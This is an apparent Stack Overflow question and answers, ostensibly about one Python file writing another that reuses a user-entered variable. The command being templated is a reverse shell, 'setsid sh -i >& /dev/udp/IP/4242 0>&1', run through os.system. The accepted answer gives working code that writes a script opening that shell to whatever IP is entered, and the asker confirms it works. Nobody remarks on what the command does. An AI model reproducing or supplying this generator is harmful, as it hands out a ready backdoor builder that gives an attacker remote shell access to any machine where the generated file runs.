# How can one python file create another with the same variable

Tags: python, linux

I have code similar to this

```
ip = input("Enter IP: ")
```

I need to make it after receving ip create new python file with this commands

```
import os
os.system('/bin/bash -c "setsid 
sh -i >& /dev/udp/"ip"/4242 
0>&1"')
```

And instead of "ip" I need it to write ip that user entered

And second script shouldn't ask for input, it should take data from first

Comment: Does this answer your question? [How can I print variable and string on same line in Python?](https://stackoverflow.com/questions/17153779/how-can-i-print-variable-and-string-on-same-line-in-python)

Comment: are you normally using jupyter? :)

Comment: I need to make my first python file create second python file with same variable, and it shouldn't ask user for input, it should take data from first file

Answer (score 1, accepted):

You could do it with the following script:

```
ip = input("Enter IP: ")
bash_script = f"/bin/bash -c 'setsid sh -i >& /dev/udp/{ip}/4242 0>&1'"
other_python_script = f"""
import os
os.system(\"""{bash_script}\""")
"""

with open("otherscript.py", "w") as python_script_file:
    python_script_file.write(other_python_script)
```

Well, what is happening there?

- First, I write the `ip` value in the string containing the bash script using the f-string and stores it in `bash_script`
- Then, I use f-string to write the `bash_script` inside the python code string that will be inside the python file. This string is stored in the `other_python_script` variable.
- Lastly, I just write the python code string in a file called `otherscript.py`.

And you will have a python file with the code you want.

You could do the first and second steps in on the same line. I separated into two lines of code for a matter of clarity. And this code works only in python 3.6^. Older versions should use other methods for write values into strings.

Comment: Thanks, it worked, I understood everything except "as python_script_file"

Comment: `python_script_file` is a [File Pointer](https://stackoverflow.com/questions/22589888/file-pointer-in-python). It was just opened differently from usual ways. Read more about _with statement_ [here](https://stackoverflow.com/questions/3012488/what-is-the-python-with-statement-designed-for).

Comment: Thank you!, U r the best

Answer (score 1):

Hopefully, this helps, please let me know if you need anything below explained.

```
import os

path = yourPathHere // insert your filePath here without the fileName itself
ip = input('insert ip address here: ') // this will contain the ip address
if not os.path.exists(path): // checks if the path does exist, if not
    os.makedirs(path) // make it

// this is a formatted string with the ip variable inside of it
pyFileContent = f'whatever/content/you/want/to/put/{ip}/whatever/else'

// creates a string of the name of your .py file
filename = 'yourPythonFileNameHere' + '.py' 

// this joins the name of filename.py and path, creates and opens it
with open(os.path.join(path, filename), 'w') as my_file:
    my_file.write(pyFileContent) // writes the content inside of it then closes
```